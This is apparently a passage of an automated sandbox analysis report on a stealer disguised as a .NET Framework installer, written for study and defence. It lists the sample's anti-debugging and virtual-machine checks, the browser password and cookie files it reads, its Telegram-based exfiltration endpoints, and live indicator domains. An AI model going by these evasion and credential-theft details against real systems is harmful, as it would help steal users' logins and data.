                          Source: Setup.exe, 00000004.00000002.3300624155.0000000003930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                          Source: EQB4OREJ.exe, 00000003.00000002.976451753.000000001C4CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
                          Source: EQB4OREJ.exe, 00000003.00000002.976451753.000000001C4CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V gjvpnntxjiwxknt Bus Pipes
                          Source: EQB4OREJ.exe, 00000003.00000002.976451753.000000001C4CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
                          Source: EQB4OREJ.exe, 00000003.00000002.976451753.000000001C4CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partitionc
                          Source: EQB4OREJ.exe, 00000003.00000002.976371340.000000001C498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V gjvpnntxjiwxknt Busop
                          Source: EQB4OREJ.exe, 00000003.00000002.970207921.0000000000932000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
                          Source: EQB4OREJ.exe, 00000003.00000002.976239529.000000001BF72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Hypervisor Root Partition
                          Source: EQB4OREJ.exe.0.drBinary or memory string: VMware Virtual
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021CA78 GetSystemInfo,2_2_0021CA78
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002192BB GetFileAttributesW,GetLastError,SetFileAttributesW,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,GetLastError,FindClose,RemoveDirectoryW,GetLastError,2_2_002192BB
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021A7B1 FindFirstFileW,GetLastError,FindNextFileW,CloseHandle,FindClose,2_2_0021A7B1
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C638097 memset,memset,FindFirstFileW,DeleteFileW,GetLastError,FindNextFileW,FindClose,4_2_6C638097
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C624281 memset,EnterCriticalSection,FindFirstFileW,LeaveCriticalSection,ctype,FindNextFileW,FindClose,ResetEvent,CreateThread,CloseHandle,GetLastError,4_2_6C624281
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C925B82 __EH_prolog3_GS,_memset,FindFirstFileW,FindNextFileW,FindClose,4_2_6C925B82
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C92410A FindFirstFileW,GetFullPathNameW,SetLastError,_wcsrchr,_wcsrchr,4_2_6C92410A
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021B4B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0021B4B3
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002291D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_002291D5
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C96C78B VirtualProtect ?,-00000001,00000104,?4_2_6C96C78B
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021621F GetTickCount,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,2_2_0021621F
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002291D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_002291D5
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0022AE73 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0022AE73
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002297AE SetUnhandledExceptionFilter,2_2_002297AE
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_00032BA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00032BA5
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_000345BE _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000345BE
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C4A87C1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C4A87C1
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C4AB38A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C4AB38A
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C62171F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C62171F
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C9476A7 __EH_prolog3,GetModuleHandleW,GetProcAddress,SetThreadStackGuarantee,SetUnhandledExceptionFilter,GetCommandLineW,4_2_6C9476A7
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C96EB6A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C96EB6A
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C96B091 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C96B091
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess created: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe "C:\ProgramData\Start Menu\G5K9HNJ7.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess created: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe "C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe" Jump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtfJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C91DF27 AllocateAndInitializeSid,4_2_6C91DF27
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C943657 GetSecurityDescriptorDacl,_malloc,InitializeSecurityDescriptor,_free,GetAclInformation,_malloc,_memcpy_s,SetSecurityDescriptorDacl,_free,_free,4_2_6C943657

                          Language, Device and Operating System Detection

                          barindex
                          Yara detected Telegram Recon
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, type: DROPPED
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeQueries volume information: C:\Users\user\Desktop\dotNetFx40_Full_setup.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe VolumeInformationJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002184C7 GetLocalTime,swprintf,2_2_002184C7
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00218E9C GetTimeZoneInformation,GetSystemTime,SystemTimeToTzSpecificLocalTime,2_2_00218E9C
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00228FF5 GetVersion,GetModuleHandleW,GetProcAddress,2_2_00228FF5
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: EQB4OREJ.exe, 00000003.00000002.975955192.000000001B870000.00000004.00000020.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970207921.000000000094E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Phemedrone Stealer
                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.13314658.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.0.EQB4OREJ.exe.480000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.13314658.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.1323b3d8.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: dotNetFx40_Full_setup.exe PID: 6744, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: EQB4OREJ.exe PID: 6896, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, type: DROPPED
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

                          Remote Access Functionality

                          barindex
                          Yara detected Phemedrone Stealer
                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.13314658.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.0.EQB4OREJ.exe.480000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.13314658.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.1323b3d8.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: dotNetFx40_Full_setup.exe PID: 6744, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: EQB4OREJ.exe PID: 6896, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts231
                          Windows Management Instrumentation                          		21
                          Windows Service                          		1
                          Access Token Manipulation                          		11
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services11
                          Archive Collected Data                          		Exfiltration Over Other Network Medium2
                          Ingress Tool Transfer                          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                          System Shutdown/Reboot
                          Default Accounts4
                          Native API                          		1
                          Registry Run Keys / Startup Folder                          		21
                          Windows Service                          		11
                          Deobfuscate/Decode Files or Information                          		LSASS Memory3
                          File and Directory Discovery                          		Remote Desktop Protocol1
                          Data from Local System                          		Exfiltration Over Bluetooth2
                          Encrypted Channel                          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain Accounts3
                          Command and Scripting Interpreter                          		Logon Script (Windows)11
                          Process Injection                          		21
                          Obfuscated Files or Information                          		Security Account Manager129
                          System Information Discovery                          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                          Non-Application Layer Protocol                          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local Accounts2
                          Service Execution                          		Logon Script (Mac)1
                          Registry Run Keys / Startup Folder                          		1
                          Timestomp                          		NTDS261
                          Security Software Discovery                          		Distributed Component Object ModelInput CaptureScheduled Transfer3
                          Application Layer Protocol                          		SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                          Masquerading                          		LSA Secrets241
                          Virtualization/Sandbox Evasion                          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.common241
                          Virtualization/Sandbox Evasion                          		Cached Domain Credentials2
                          Process Discovery                          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                          Access Token Manipulation                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                          Process Injection                          		Proc Filesystem1
                          System Network Configuration Discovery                          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1319489 Sample: dotNetFx40_Full_setup.exe Startdate: 04/10/2023 Architecture: WINDOWS Score: 100 40 rakishev.net 2->40 42 ip-api.com 2->42 48 Multi AV Scanner detection for domain / URL 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 54 8 other signatures 2->54 10 dotNetFx40_Full_setup.exe 6 2->10         started        signatures3 process4 file5 36 C:\Users\user\AppData\Local\...QB4OREJ.exe, PE32 10->36 dropped 38 C:\ProgramData\Microsoft\...behaviorgraph5K9HNJ7.exe, PE32 10->38 dropped 13 EQB4OREJ.exe 23 3 10->13         started        17 G5K9HNJ7.exe 139 10->17         started        20 conhost.exe 10->20         started        process6 dnsIp7 44 ip-api.com 208.95.112.1, 49683, 80 TUT-ASUS United States 13->44 46 rakishev.net 104.21.88.34, 49687, 80 CLOUDFLARENETUS United States 13->46 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->56 58 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 13->58 60 Tries to harvest and steal browser information (history, passwords, etc) 13->60 28 C:\6c8944922f7b98d0b6cd82b768\sqmapi.dll, PE32 17->28 dropped 30 C:\...\SetupUtility.exe, PE32 17->30 dropped 32 C:\6c8944922f7b98d0b6cd82b768\SetupUi.dll, PE32 17->32 dropped 34 27 other files (none is malicious) 17->34 dropped 22 Setup.exe 5 7 17->22         started        file8 signatures9 process10 process11 24 WINWORD.EXE 22->24         started        process12 26 splwow64.exe 24->26         started       

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          dotNetFx40_Full_setup.exe57%VirustotalBrowse
                          dotNetFx40_Full_setup.exe51%ReversingLabsByteCode-MSIL.Packed.Generic
                          dotNetFx40_Full_setup.exe100%AviraTR/Dropper.Gen2
                          dotNetFx40_Full_setup.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\6c8944922f7b98d0b6cd82b768\1025\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1025\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1028\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1028\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1029\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1029\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1030\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1030\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1031\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1031\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1032\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1032\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1033\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1033\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1035\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1035\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1036\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1036\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1037\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1037\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1038\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1038\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1040\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1040\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1041\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1041\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1042\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1042\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1043\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1043\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1044\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1044\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1045\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1045\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1046\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1046\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1049\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1049\SetupResources.dll0%VirustotalBrowse
                          C:\6c8944922f7b98d0b6cd82b768\1053\SetupResources.dll0%ReversingLabs
                          C:\6c8944922f7b98d0b6cd82b768\1053\SetupResources.dll0%VirustotalBrowse

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          SourceDetectionScannerLabelLink
                          rakishev.net6%VirustotalBrowse

                          URLs

                          SourceDetectionScannerLabelLink
                          http://rakishev.net0%Avira URL Cloudsafe
                          http://rakishev.net/wp-load.php100%Avira URL Cloudmalware
                          http://rakishev.net/wp-load.php11%VirustotalBrowse
                          http://rakishev.net6%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          rakishev.net
                          		104.21.88.34
                          		truefalseunknown
                          ip-api.com
                          		208.95.112.1
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://rakishev.net/wp-load.phpfalse
                            • 11%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            		unknown
                            http://ip-api.com/json/?fields=11827false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/botdotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe.0.drfalse
                                		high
                                http://rakishev.netEQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpfalse
                                • 6%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameEQB4OREJ.exe, 00000003.00000002.970955831.0000000002700000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://t.me/reyvortexdotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002821000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002977000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.971799704.0000000012939000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe.0.drfalse
                                    		high
                                    https://t.me/TheDyerdotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002821000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002977000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.971799704.0000000012939000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe.0.drfalse
                                      		high
                                      http://ip-api.comEQB4OREJ.exe, 00000003.00000002.970955831.0000000002700000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        208.95.112.1
                                        		ip-api.comUnited States
                                        		53334TUT-ASUSfalse
                                        104.21.88.34
